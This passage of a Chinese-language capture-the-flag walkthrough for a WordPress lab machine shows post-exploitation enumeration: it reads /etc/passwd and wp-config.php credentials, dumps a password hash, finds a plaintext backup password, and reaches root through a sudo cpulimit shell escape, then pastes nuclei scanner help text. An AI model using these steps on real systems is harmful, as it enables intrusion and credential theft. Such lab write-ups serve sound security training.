src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628162347656\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@canto:\/var\/www\/html\/wp-content\/plugins\/canto\/includes\/lib$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@canto:\/var\/www\/html\/wp-content\/plugins\/canto\/includes\/lib$ cd ~ \n(remote) www-data@canto:\/var\/www$ ls\nhtml\n(remote) www-data@canto:\/var\/www$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\ndhcpcd:x:100:65534:DHCP Client Daemon,,,:\/usr\/lib\/dhcpcd:\/bin\/false\nmessagebus:x:101:106::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-resolve:x:996:996:systemd 
Resolver:\/:\/usr\/sbin\/nologin\npollinate:x:102:1::\/var\/cache\/pollinate:\/bin\/false\npolkitd:x:995:995:polkit:\/nonexistent:\/usr\/sbin\/nologin\nsyslog:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nuuidd:x:104:110::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:105:111::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:106:112:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nlandscape:x:107:113::\/var\/lib\/landscape:\/usr\/sbin\/nologin\nfwupd-refresh:x:108:114:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nusbmux:x:109:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nsshd:x:110:65534::\/run\/sshd:\/usr\/sbin\/nologin\nlxd:x:999:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\nmysql:x:111:116:MySQL Server,,,:\/nonexistent:\/bin\/false\nerik:x:1001:1001::\/home\/erik:\/bin\/bash\n(remote) www-data@canto:\/var\/www$ \n(remote) www-data@canto:\/var\/www$ cat \/etc\/passwd | grep &quot;sh&quot;  \nroot:x:0:0:root:\/root:\/bin\/bash\nfwupd-refresh:x:108:114:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:110:65534::\/run\/sshd:\/usr\/sbin\/nologin\nerik:x:1001:1001::\/home\/erik:\/bin\/bash\n(remote) www-data@canto:\/var\/www$ ls \/home\nerik\n(remote) www-data@canto:\/var\/www$ cd html\n(remote) www-data@canto:\/var\/www\/html$ ls -la\ntotal 248\ndrwxr-xr-x  5 www-data www-data  4096 Jun 28 07:08 .\ndrwxr-xr-x  3 www-data www-data  4096 May 12 13:57 ..\n-rw-r--r--  1 www-data www-data   523 May 12 11:16 .htaccess\n-rw-r--r--  1 www-data www-data   405 May 12 11:09 index.php\n-rw-r--r--  1 www-data www-data 19915 May 12 11:09 license.txt\n-rw-r--r--  1 www-data www-data  7401 Jun 28 07:08 readme.html\n-rw-r--r--  1 www-data www-data  7387 May 12 11:09 wp-activate.php\ndrwxr-xr-x  9 www-data www-data  4096 May 12 11:09 wp-admin\n-rw-r--r--  1 www-data www-data   351 May 12 11:09 wp-blog-header.php\n-rw-r--r--  1 www-data www-data  2323 May 12 11:09 wp-comments-post.php\n-rw-r--r--  1 www-data www-data  3012 May 12 11:09 
wp-config-sample.php\n-rw-r--r--  1 root     root      3120 May 12 15:12 wp-config.php\ndrwxr-xr-x  6 www-data www-data  4096 Jun 28 07:08 wp-content\n-rw-r--r--  1 www-data www-data  5638 May 12 11:09 wp-cron.php\ndrwxr-xr-x 30 www-data www-data 16384 May 12 11:09 wp-includes\n-rw-r--r--  1 www-data www-data  2502 May 12 11:09 wp-links-opml.php\n-rw-r--r--  1 www-data www-data  3927 May 12 11:09 wp-load.php\n-rw-r--r--  1 www-data www-data 50917 May 12 11:09 wp-login.php\n-rw-r--r--  1 www-data www-data  8525 May 12 11:09 wp-mail.php\n-rw-r--r--  1 www-data www-data 28427 May 12 11:09 wp-settings.php\n-rw-r--r--  1 www-data www-data 34385 May 12 11:09 wp-signup.php\n-rw-r--r--  1 www-data www-data  4885 May 12 11:09 wp-trackback.php\n-rw-r--r--  1 www-data www-data  3246 May 12 11:09 xmlrpc.php\n(remote) www-data@canto:\/var\/www\/html$ cat wp-config.php<\/code><\/pre>\n<pre><code class=\"language-php\">&lt;?php\n\/**\n * The base configuration for WordPress\n *\n * The wp-config.php creation script uses this file during the installation.\n * You don&#039;t have to use the website, you can copy this file to &quot;wp-config.php&quot;\n * and fill in the values.\n *\n * This file contains the following configurations:\n *\n * * Database settings\n * * Secret keys\n * * Database table prefix\n * * ABSPATH\n *\n * @link https:\/\/wordpress.org\/documentation\/article\/editing-wp-config-php\/\n *\n * @package WordPress\n *\/\n\n\/\/ ** Database settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine( &#039;DB_NAME&#039;, &#039;wordpress&#039; );\n\n\/** Database username *\/\ndefine( &#039;DB_USER&#039;, &#039;wordpress&#039; );\n\n\/** Database password *\/\ndefine( &#039;DB_PASSWORD&#039;, &#039;2NCVjoWVE9iwxPz&#039; );\n\n\/** Database hostname *\/\ndefine( &#039;DB_HOST&#039;, &#039;localhost&#039; );\n\n\/** Database charset to use in creating database tables. 
*\/\ndefine( &#039;DB_CHARSET&#039;, &#039;utf8&#039; );\n\n\/** The database collate type. Don&#039;t change this if in doubt. *\/\ndefine( &#039;DB_COLLATE&#039;, &#039;&#039; );\n\ndefine(&#039;WP_HOME&#039;,&#039;http:\/\/&#039; . $_SERVER[&#039;SERVER_ADDR&#039;]);\ndefine(&#039;WP_SITEURL&#039;,&#039;http:\/\/&#039; . $_SERVER[&#039;SERVER_ADDR&#039;]);\n\n\/**#@+\n * Authentication unique keys and salts.\n *\n * Change these to different unique phrases! You can generate these using\n * the {@link https:\/\/api.wordpress.org\/secret-key\/1.1\/salt\/ WordPress.org secret-key service}.\n *\n * You can change these at any point in time to invalidate all existing cookies.\n * This will force all users to have to log in again.\n *\n * @since 2.6.0\n *\/\ndefine( &#039;AUTH_KEY&#039;,         &#039;put your unique phrase here&#039; );\ndefine( &#039;SECURE_AUTH_KEY&#039;,  &#039;put your unique phrase here&#039; );\ndefine( &#039;LOGGED_IN_KEY&#039;,    &#039;put your unique phrase here&#039; );\ndefine( &#039;NONCE_KEY&#039;,        &#039;put your unique phrase here&#039; );\ndefine( &#039;AUTH_SALT&#039;,        &#039;put your unique phrase here&#039; );\ndefine( &#039;SECURE_AUTH_SALT&#039;, &#039;put your unique phrase here&#039; );\ndefine( &#039;LOGGED_IN_SALT&#039;,   &#039;put your unique phrase here&#039; );\ndefine( &#039;NONCE_SALT&#039;,       &#039;put your unique phrase here&#039; );\n\n\/**#@-*\/\n\n\/**\n * WordPress database table prefix.\n *\n * You can have multiple installations in one database if you give each\n * a unique prefix. 
Only numbers, letters, and underscores please!\n *\/\n$table_prefix = &#039;wp_&#039;;\n\n\/**\n * For developers: WordPress debugging mode.\n *\n * Change this to true to enable the display of notices during development.\n * It is strongly recommended that plugin and theme developers use WP_DEBUG\n * in their development environments.\n *\n * For information on other constants that can be used for debugging,\n * visit the documentation.\n *\n * @link https:\/\/wordpress.org\/documentation\/article\/debugging-in-wordpress\/\n *\/\ndefine( &#039;WP_DEBUG&#039;, false );\n\n\/* Add any custom values between this line and the &quot;stop editing&quot; line. *\/\n\n\/* That&#039;s all, stop editing! Happy publishing. *\/\n\n\/** Absolute path to the WordPress directory. *\/\nif ( ! defined( &#039;ABSPATH&#039; ) ) {\n        define( &#039;ABSPATH&#039;, __DIR__ . &#039;\/&#039; );\n}\n\n\/** Sets up WordPress vars and included files. *\/\nrequire_once ABSPATH . &#039;wp-settings.php&#039;;<\/code><\/pre>\n<h3>\u67e5\u770b\u6570\u636e\u5e93<\/h3>\n<p>\u5f97\u5230\u4e86\u7528\u6237\u540d\u5bc6\u7801\uff0c\u5c1d\u8bd5\u8fde\u63a5\u6570\u636e\u5e93\uff1a<\/p>\n<pre><code class=\"language-text\">wordpress\n2NCVjoWVE9iwxPz<\/code><\/pre>\n<pre><code class=\"language-bash\">(remote) www-data@canto:\/var\/www\/html$ mysql -u wordpress -p\nEnter password: \nWelcome to the MySQL monitor.  Commands end with ; or \\g.\nYour MySQL connection id is 30247\nServer version: 8.0.36-0ubuntu0.23.10.1 (Ubuntu)\n\nCopyright (c) 2000, 2024, Oracle and\/or its affiliates.\n\nOracle is a registered trademark of Oracle Corporation and\/or its\naffiliates. Other names may be trademarks of their respective\nowners.\n\nType &#039;help;&#039; or &#039;\\h&#039; for help. 
Type &#039;\\c&#039; to clear the current input statement.\n\nmysql&gt; show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| information_schema |\n| performance_schema |\n| wordpress          |\n+--------------------+\n3 rows in set (0.01 sec)\n\nmysql&gt; use wordpress;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql&gt; show tables;\n+-----------------------+\n| Tables_in_wordpress   |\n+-----------------------+\n| wp_commentmeta        |\n| wp_comments           |\n| wp_links              |\n| wp_options            |\n| wp_postmeta           |\n| wp_posts              |\n| wp_term_relationships |\n| wp_term_taxonomy      |\n| wp_termmeta           |\n| wp_terms              |\n| wp_usermeta           |\n| wp_users              |\n+-----------------------+\n12 rows in set (0.00 sec)\n\nmysql&gt; show columns from wp_users;\n+---------------------+-----------------+------+-----+---------------------+----------------+\n| Field               | Type            | Null | Key | Default             | Extra          |\n+---------------------+-----------------+------+-----+---------------------+----------------+\n| ID                  | bigint unsigned | NO   | PRI | NULL                | auto_increment |\n| user_login          | varchar(60)     | NO   | MUL |                     |                |\n| user_pass           | varchar(255)    | NO   |     |                     |                |\n| user_nicename       | varchar(50)     | NO   | MUL |                     |                |\n| user_email          | varchar(100)    | NO   | MUL |                     |                |\n| user_url            | varchar(100)    | NO   |     |                     |                |\n| user_registered     | datetime        | NO   |     | 0000-00-00 00:00:00 |                |\n| user_activation_key | varchar(255)    | NO   |     |         
            |                |\n| user_status         | int             | NO   |     | 0                   |                |\n| display_name        | varchar(250)    | NO   |     |                     |                |\n+---------------------+-----------------+------+-----+---------------------+----------------+\n10 rows in set (0.00 sec)\n\nmysql&gt; select user_login,user_pass from wp_users;\n+------------+------------------------------------+\n| user_login | user_pass                          |\n+------------+------------------------------------+\n| erik       | $P$BZk2jE4XrC91HKgRS83h0gICjM0bcB. |\n+------------+------------------------------------+\n1 row in set (0.01 sec)<\/code><\/pre>\n<p>\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ hash-identifier                                                \n   #########################################################################\n   #     __  __                     __           ______    _____           #\n   #    \/\\ \\\/\\ \\                   \/\\ \\         \/\\__  _\\  \/\\  _ `\\         #\n   #    \\ \\ \\_\\ \\     __      ____ \\ \\ \\___     \\\/_\/\\ \\\/  \\ \\ \\\/\\ \\        #\n   #     \\ \\  _  \\  \/&#039;__`\\   \/ ,__\\ \\ \\  _ `\\      \\ \\ \\   \\ \\ \\ \\ \\       #\n   #      \\ \\ \\ \\ \\\/\\ \\_\\ \\_\/\\__, `\\ \\ \\ \\ \\ \\      \\_\\ \\__ \\ \\ \\_\\ \\      #\n   #       \\ \\_\\ \\_\\ \\___ \\_\\\/\\____\/  \\ \\_\\ \\_\\     \/\\_____\\ \\ \\____\/      #\n   #        \\\/_\/\\\/_\/\\\/__\/\\\/_\/\\\/___\/    \\\/_\/\\\/_\/     \\\/_____\/  \\\/___\/  v1.2 #\n   #                                                             By Zion3R #\n   #                                                    www.Blackploit.com #\n   #                                                   Root@Blackploit.com #\n   
#########################################################################\n--------------------------------------------------\n HASH: $P$BZk2jE4XrC91HKgRS83h0gICjM0bcB.\n\nPossible Hashs:\n[+] MD5(WordPress)\n--------------------------------------------------<\/code><\/pre>\n<p>hash-identifier \u53ea\u80fd\u8bc6\u522b\u51fa\u54c8\u5e0c\u7c7b\u578b\uff08WordPress \u7684 phpass\uff09\uff0c\u5f97\u4e0d\u5230\u660e\u6587\u5bc6\u7801\uff0c\u6ca1\u6709\u6536\u83b7\uff0c\u7ee7\u7eed\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@canto:\/var\/www\/html$ cd \/home\/erik\/\n(remote) www-data@canto:\/home\/erik$ ls -la\ntotal 36\ndrwxr-xr-- 5 erik www-data 4096 May 12 13:56 .\ndrwxr-xr-x 3 root root     4096 May 12 14:24 ..\nlrwxrwxrwx 1 root root        9 May 12 13:56 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 erik erik      220 Jan  7  2023 .bash_logout\n-rw-r--r-- 1 erik erik     3771 Jan  7  2023 .bashrc\ndrwx------ 2 erik erik     4096 May 12 12:21 .cache\ndrwxrwxr-x 3 erik erik     4096 May 12 12:03 .local\n-rw-r--r-- 1 erik erik      807 Jan  7  2023 .profile\ndrwxrwxr-x 2 erik erik     4096 May 12 17:22 notes\n-rw-r----- 1 root erik       33 May 12 12:22 user.txt\n(remote) www-data@canto:\/home\/erik$ cd notes\/\n(remote) www-data@canto:\/home\/erik\/notes$ ls -la \ntotal 16\ndrwxrwxr-x 2 erik erik     4096 May 12 17:22 .\ndrwxr-xr-- 5 erik www-data 4096 May 12 13:56 ..\n-rw-rw-r-- 1 erik erik       68 May 12 12:07 Day1.txt\n-rw-rw-r-- 1 erik erik       71 May 12 17:22 Day2.txt\n(remote) www-data@canto:\/home\/erik\/notes$ cat *\nOn the first day I have updated some plugins and the website theme.\nI almost lost the database with my user so I created a backups folder.\n(remote) www-data@canto:\/home\/erik\/notes$ find \/ -name backups 2&gt;\/dev\/null\n\/snap\/core22\/1380\/var\/backups\n\/snap\/core22\/864\/var\/backups\n\/var\/backups\n\/var\/wordpress\/backups\n(remote) www-data@canto:\/home\/erik\/notes$ cat \/var\/wordpress\/backups\ncat: \/var\/wordpress\/backups: Is a directory\n(remote) www-data@canto:\/home\/erik\/notes$ cd \/var\/wordpress\/backups\n(remote) 
www-data@canto:\/var\/wordpress\/backups$ ls -la\ntotal 12\ndrwxr-xr-x 2 root root 4096 May 12 17:15 .\ndrwxr-xr-x 3 root root 4096 May 12 17:14 ..\n-rw-r--r-- 1 root root  185 May 12 17:14 12052024.txt\n(remote) www-data@canto:\/var\/wordpress\/backups$ cat *\n------------------------------------\n| Users     |      Password        |\n------------|----------------------|\n| erik      | th1sIsTheP3ssw0rd!   |\n------------------------------------<\/code><\/pre>\n<p>\u5636\u3002\u3002\u3002\u3002\u3002\u3002\u5907\u4efd\u6587\u4ef6\u91cc\u662f\u660e\u6587\u5bc6\u7801\uff0c\u6240\u6709\u7528\u6237\u53ef\u8bfb\u3002<\/p>\n<h2>\u5207\u6362\u7528\u6237Erik\u5c1d\u8bd5\u63d0\u6743<\/h2>\n<pre><code class=\"language-bash\">(remote) www-data@canto:\/var\/wordpress\/backups$ su erik              \nPassword: \nerik@canto:\/var\/wordpress\/backups$ cd ~\nerik@canto:~$ cat user.txt \nd41d8cd98f00b204e9800998ecf8427e\nerik@canto:~$ sudo -l\nMatching Defaults entries for erik on canto:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser erik may run the following commands on canto:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/cpulimit<\/code><\/pre>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/cpulimit\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/cpulimit\/#sudo<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642162.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406281642162.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"image-20240628163718398\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>cpulimit \u53ef\u4ee5\u542f\u52a8\u4efb\u610f\u7a0b\u5e8f\uff0c\u8fd9\u6761 NOPASSWD \u89c4\u5219\u7b49\u540c\u4e8e\u76f4\u63a5\u7ed9\u4e86 root\uff0c\u5c1d\u8bd5\u63d0\u6743\uff1a<\/p>\n<pre><code class=\"language-bash\">erik@canto:~$ sudo \/usr\/bin\/cpulimit -l 100 -f \/bin\/bash\nProcess 3159 detected\nroot@canto:\/home\/erik# cd ~\nroot@canto:~# cat root.txt \n1b56eefaab2c896e57c874a635b24b49<\/code><\/pre>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<p>\u505a\u5b8c\u4ee5\u540e\uff0c\u770b\u4e86\u4e00\u4e0b\u5176\u4ed6\u5e08\u5085\u7684\u505a\u6cd5\uff0c\u53d1\u73b0\u4e86\u4e00\u4e2a\u5de5\u5177<code>nuclei<\/code>\uff0c\u662f\u4e00\u4e2a\u5feb\u901f\u3001\u53ef\u914d\u7f6e\u7684\u3001\u7528\u4e8e\u626b\u63cf\u7f51\u7edc\u6f0f\u6d1e\u7684\u547d\u4ee4\u884c\u5de5\u5177\uff0c\u5728\u9776\u673a\u5220\u9664\u524d\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code>\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ go install -v github.com\/projectdiscovery\/nuclei\/v3\/cmd\/nuclei@latest\ngo: downloading github.com\/projectdiscovery\/nuclei\/v3 v3.2.9\ngo: downloading github.com\/projectdiscovery\/nuclei v1.1.7\n.........\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/go\/bin]\n\u2514\u2500$ sudo ln -s \/home\/kali\/go\/bin\/nuclei \/usr\/sbin\/nuclei\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[\/]\n\u2514\u2500$ nuclei -h                            \nNuclei is a fast, template based vulnerability scanner focusing\non extensive configurability, massive extensibility and ease of use.\n\nUsage:\n  nuclei [flags]\n\nFlags:\nTARGET:\n   -u, -target string[]          target URLs\/hosts to scan\n   -l, -list string              path to file containing a list of target URLs\/hosts to scan (one per line)\n   -eh, -exclude-hosts string[]  hosts to exclude to scan from the input list (ip, cidr, hostname)\n   -resume string                resume scan using resume.cfg (clustering will be disabled)\n   -sa, -scan-all-ips            scan all the IP&#039;s associated with dns record\n   -iv, -ip-version string[]     IP version to scan of hostname (4,6) - 
(default 4)\n\nTARGET-FORMAT:\n   -im, -input-mode string        mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default &quot;list&quot;)\n   -ro, -required-only            use only required fields in input format when generating requests\n   -sfv, -skip-format-validation  skip format validation (like missing vars) when parsing input file\n\nTEMPLATES:\n   -nt, -new-templates                    run only new templates added in latest nuclei-templates release\n   -ntv, -new-templates-version string[]  run new templates added in specific version\n   -as, -automatic-scan                   automatic web scan using wappalyzer technology detection to tags mapping\n   -t, -templates string[]                list of template or template directory to run (comma-separated, file)\n   -turl, -template-url string[]          template url or list containing template urls to run (comma-separated, file)\n   -w, -workflows string[]                list of workflow or workflow directory to run (comma-separated, file)\n   -wurl, -workflow-url string[]          workflow url or list containing workflow urls to run (comma-separated, file)\n   -validate                              validate the passed templates to nuclei\n   -nss, -no-strict-syntax                disable strict syntax check on templates\n   -td, -template-display                 displays the templates content\n   -tl                                    list all available templates\n   -tgl                                   list all available tags\n   -sign                                  signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable\n   -code                                  enable loading code protocol-based templates\n   -dut, -disable-unsigned-templates      disable running unsigned templates or templates with mismatched signature\n\nFILTERING:\n   -a, -author string[]               templates to run based on authors (comma-separated, file)\n   -tags string[] 
                    templates to run based on tags (comma-separated, file)\n   -etags, -exclude-tags string[]     templates to exclude based on tags (comma-separated, file)\n   -itags, -include-tags string[]     tags to be executed even if they are excluded either by default or configuration\n   -id, -template-id string[]         templates to run based on template ids (comma-separated, file, allow-wildcard)\n   -eid, -exclude-id string[]         templates to exclude based on template ids (comma-separated, file)\n   -it, -include-templates string[]   path to template file or directory to be executed even if they are excluded either by default or configuration\n   -et, -exclude-templates string[]   path to template file or directory to exclude (comma-separated, file)\n   -em, -exclude-matchers string[]    template matchers to exclude in result\n   -s, -severity value[]              templates to run based on severity. Possible values: info, low, medium, high, critical, unknown\n   -es, -exclude-severity value[]     templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown\n   -pt, -type value[]                 templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n   -ept, -exclude-type value[]        templates to exclude based on protocol type. 
Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n   -tc, -template-condition string[]  templates to run based on expression condition\n\nOUTPUT:\n   -o, -output string            output file to write found issues\/vulnerabilities\n   -sresp, -store-resp           store all request\/response passed through nuclei to output directory\n   -srd, -store-resp-dir string  store all request\/response passed through nuclei to custom directory (default &quot;output&quot;)\n   -silent                       display findings only\n   -nc, -no-color                disable output content coloring (ANSI escape codes)\n   -j, -jsonl                    write output in JSONL(ines) format\n   -irr, -include-rr -omit-raw   include request\/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true)\n   -or, -omit-raw                omit request\/response pairs in the JSON, JSONL, and Markdown outputs (for findings only)\n   -ot, -omit-template           omit encoded template in the JSON, JSONL output\n   -nm, -no-meta                 disable printing result metadata in cli output\n   -ts, -timestamp               enables printing timestamp in cli output\n   -rdb, -report-db string       nuclei reporting database (always use this to persist report data)\n   -ms, -matcher-status          display match failure status\n   -me, -markdown-export string  directory to export results in markdown format\n   -se, -sarif-export string     file to export results in SARIF format\n   -je, -json-export string      file to export results in JSON format\n   -jle, -jsonl-export string    file to export results in JSONL(ine) format\n\nCONFIGURATIONS:\n   -config string                        path to the nuclei configuration file\n   -tp, -profile string                  template profile config file to run\n   -tpl, -profile-list                   list community template profiles\n   -fr, 
-follow-redirects                enable following redirects for http templates\n   -fhr, -follow-host-redirects          follow redirects on the same host\n   -mr, -max-redirects int               max number of redirects to follow for http templates (default 10)\n   -dr, -disable-redirects               disable redirects for http templates\n   -rc, -report-config string            nuclei reporting module configuration file\n   -H, -header string[]                  custom header\/cookie to include in all http request in header:value format (cli, file)\n   -V, -var value                        custom vars in key=value format\n   -r, -resolvers string                 file containing resolver list for nuclei\n   -sr, -system-resolvers                use system DNS resolving as error fallback\n   -dc, -disable-clustering              disable clustering of requests\n   -passive                              enable passive HTTP response processing mode\n   -fh2, -force-http2                    force http2 connection on requests\n   -ev, -env-vars                        enable environment variables to be used in template\n   -cc, -client-cert string              client certificate file (PEM-encoded) used for authenticating against scanned hosts\n   -ck, -client-key string               client key file (PEM-encoded) used for authenticating against scanned hosts\n   -ca, -client-ca string                client certificate authority file (PEM-encoded) used for authenticating against scanned hosts\n   -sml, -show-match-line                show match lines for file templates, works with extractors only\n   -ztls                                 use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default\n   -sni string                           tls sni hostname to use (default: input domain name)\n   -dt, -dialer-timeout value            timeout for network requests.\n   -dka, -dialer-keep-alive value        keep-alive 
duration for network requests.\n   -lfa, -allow-local-file-access        allows file (payload) access anywhere on the system\n   -lna, -restrict-local-network-access  blocks connections to the local \/ private network\n   -i, -interface string                 network interface to use for network scan\n   -at, -attack-type string              type of payload combinations to perform (batteringram,pitchfork,clusterbomb)\n   -sip, -source-ip string               source ip address to use for network scan\n   -rsr, -response-size-read int         max response size to read in bytes\n   -rss, -response-size-save int         max response size to read in bytes (default 1048576)\n   -rrt, -response-read-timeout value    response read timeout in seconds (default 5s)\n   -reset                                reset removes all nuclei configuration and data files (including nuclei-templates)\n   -tlsi, -tls-impersonate               enable experimental client hello (ja3) tls randomization\n   -hae, -http-api-endpoint string       experimental http api endpoint\n\nINTERACTSH:\n   -iserver, -interactsh-server string  interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)\n   -itoken, -interactsh-token string    authentication token for self-hosted interactsh server\n   -interactions-cache-size int         number of requests to keep in the interactions cache (default 5000)\n   -interactions-eviction int           number of seconds to wait before evicting requests from cache (default 60)\n   -interactions-poll-duration int      number of seconds to wait before each interaction poll request (default 5)\n   -interactions-cooldown-period int    extra time for interaction polling before exiting (default 5)\n   -ni, -no-interactsh                  disable interactsh server for OAST testing, exclude OAST based templates\n\nFUZZING:\n   -ft, -fuzzing-type string     overrides fuzzing type set in template (replace, prefix, postfix, 
infix)\n   -fm, -fuzzing-mode string     overrides fuzzing mode set in template (multiple, single)\n   -fuzz                         enable loading fuzzing templates (Deprecated: use -dast instead)\n   -dast                         enable \/ run dast (fuzz) nuclei templates\n   -dfp, -display-fuzz-points    display fuzz points in the output for debugging\n   -fuzz-param-frequency int     frequency of uninteresting parameters for fuzzing before skipping (default 10)\n   -fa, -fuzz-aggression string  fuzzing aggression level controls payload count for fuzz (low, medium, high) (default &quot;low&quot;)\n\nUNCOVER:\n   -uc, -uncover                  enable uncover engine\n   -uq, -uncover-query string[]   uncover search query\n   -ue, -uncover-engine string[]  uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow,google) (default shodan)\n   -uf, -uncover-field string     uncover fields to return (ip,port,host) (default &quot;ip:port&quot;)\n   -ul, -uncover-limit int        uncover results to return (default 100)\n   -ur, -uncover-ratelimit int    override ratelimit of engines with unknown ratelimit (default 60 req\/min) (default 60)\n\nRATE-LIMIT:\n   -rl, -rate-limit int               maximum number of requests to send per second (default 150)\n   -rld, -rate-limit-duration value   maximum number of requests to send per second (default 1s)\n   -rlm, -rate-limit-minute int       maximum number of requests to send per minute (DEPRECATED)\n   -bs, -bulk-size int                maximum number of hosts to be analyzed in parallel per template (default 25)\n   -c, -concurrency int               maximum number of templates to be executed in parallel (default 25)\n   -hbs, -headless-bulk-size int      maximum number of headless hosts to be analyzed in parallel per template (default 10)\n   -headc, -headless-concurrency int  maximum number of headless templates to be executed in parallel (default 10)\n   -jsc, 
-js-concurrency int          maximum number of javascript runtimes to be executed in parallel (default 120)\n   -pc, -payload-concurrency int      max payload concurrency for each template (default 25)\n   -prc, -probe-concurrency int       http probe concurrency with httpx (default 50)\n\nOPTIMIZATIONS:\n   -timeout int                     time to wait in seconds before timeout (default 10)\n   -retries int                     number of times to retry a failed request (default 1)\n   -ldp, -leave-default-ports       leave default HTTP\/HTTPS ports (eg. host:80,host:443)\n   -mhe, -max-host-error int        max errors for a host before skipping from scan (default 30)\n   -te, -track-error string[]       adds given error to max-host-error watchlist (standard, file)\n   -nmhe, -no-mhe                   disable skipping host from scan based on errors\n   -project                         use a project folder to avoid sending same request multiple times\n   -project-path string             set a specific project path (default &quot;\/tmp&quot;)\n   -spm, -stop-at-first-match       stop processing HTTP requests after the first match (may break template\/workflow logic)\n   -stream                          stream mode - start elaborating without sorting the input\n   -ss, -scan-strategy value        strategy to use while scanning(auto\/host-spray\/template-spray) (default auto)\n   -irt, -input-read-timeout value  timeout on input read (default 3m0s)\n   